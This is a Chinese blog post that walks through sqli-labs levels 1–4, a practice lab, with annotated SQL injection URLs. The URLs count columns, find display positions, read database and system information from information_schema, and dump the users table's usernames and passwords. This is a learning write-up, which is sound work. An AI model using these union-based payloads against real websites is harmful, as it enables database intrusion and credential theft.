sql注入(3)sqli-labs1-4

sql注入(3)sqli-labs1-4,第1张

目录

1.less-1 基于错误的GET单引号字符型注入

1.1判断注入点

1.2猜字段数

1.3判断显示位

1.4信息搜集

1.5数据收集

1.5.1爆破表名

 1.5.2爆破列名

1.5.3爆破users表

 2.less-2基于错误的GET整形注入

2.1注入点判断

3.less-3基于错误的GET单引号变形字符型注入

3.1注入点的判断

4.less-4基于错误的GET双引号字符型注入

4.1注入点判断


1.less-1 基于错误的GET单引号字符型注入 1.1判断注入点

/sqli-labs-master/Less-1/?id=1'

1.2猜字段数

/sqli-labs-master/Less-1/?id=1' order by 1 --+

/sqli-labs-master/Less-1/?id=1' order by 2 --+

/sqli-labs-master/Less-1/?id=1' order by 3 --+

/sqli-labs-master/Less-1/?id=1' order by 4 --+

可以得到有3个字段。

-++是为了注释掉后面的内容,相当于#,?id=1'的作用是让这个字段错误,然后让系统执行union后面的字段。

1.3判断显示位

/sqli-labs-master/Less-1/?id=1'and 1=2 union select 1,2,3 --+

或者/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+

这里and 1=2或者负号的作用是让union前面的字段错误,然后执行union后面的字段。

1.4信息搜集

database:security

version:5.5.53

user:root@lacalhost

version_compile_os:win32

/sqli-labs-master/Less-1/?id=1'and 1=2 union select 1,database(),version() --+ 

/sqli-labs-master/Less-1/?id=-1' union select 1,user(),@@version_compile_os --+

1.5数据收集

版本为5.5.53,存在information_schema数据库。

1.5.1爆破表名

/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

 1.5.2爆破列名

/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' --+

(数据库security包含的全部列名)

/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

(user表包含的列名)

1.5.3爆破users表

爆破users表中的用户名username和密码password

/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

 2.less-2基于错误的GET整形注入 2.1注入点判断

所以不加单引号即为整形。

/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,3 --+

//注意:所有符号必须在英文状态下输入,因为MySQL只支持英文符号。

其余注入内容和第一题类似。

3.less-3基于错误的GET单引号变形字符型注入 3.1注入点的判断

/sqli-labs-master/Less-3/?id=1')

/sqli-labs-master/Less-3/?id=1')%20 and 1=2 union select 1,2,3 --+ 

其余注入步骤如less-1

4.less-4基于错误的GET双引号字符型注入 4.1注入点判断

/sqli-labs-master/Less-4/?id=1")and 1=2 union select 1,2,3 --+

 其余步骤和less-1一样,结果也一样。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/788570.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-05
下一篇 2022-05-05

发表评论

登录后才能评论

评论列表(0条)

保存